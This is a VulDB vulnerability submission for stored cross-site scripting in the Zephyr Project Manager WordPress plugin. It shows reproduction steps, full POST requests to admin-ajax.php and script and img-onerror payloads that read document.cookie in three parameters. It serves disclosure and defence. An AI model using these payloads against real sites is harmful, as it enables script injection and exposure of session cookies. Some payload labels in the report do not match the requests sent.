제출 #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS정보

제목	Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS
설명	Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. > It has been determined that in most places throughout the application, the data from the input field can be injected as html without any sanitization and validation. The details of the discovery are given below. ## Proof of Concept (PoC) The details of the various (Reflexted and Stored) XSS on the application are given below. ### Endpoint Of New Discussion For Task. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 2. Click on Discussion tab. 3. Fill in payload in the comment field. 4. Click on "Comment". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 108 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7 Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : message ### Endpoint Of New Team and Team Update. (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "New Team" or "Edit Team". 3. Fill in payload in the team name and team description field. 4. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : name,description ### Endpoint Of User Access (Stored XSS) Steps To Reproduce : 1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members 2. Click on "Bulk Edit Access". 3. Choose any options. 4. Click on "Allow Access". 5. "access" parameter is intervened by proxy. 6. Click on "Create Team". Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1103 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access Payload : %3cscript%3ealert(document.cookie)%3c%2fscript%3e Parameter(s) : access
원천	⚠️ https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed
사용자	r1z4x (UID 31999)
제출	2022. 09. 13. PM 02:39 (4 연령 ago)
모더레이션	2022. 09. 23. AM 08:58 (10 days later)
상태	수락
VulDB 항목	209370 [Zephyr Project Manager 까지 3.2.4 켜짐 WordPress REST Call /v1/tasks/create/ onanimationstart 크로스 사이트 스크립팅]
포인트들	20

◂ 이전 개요 다음 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!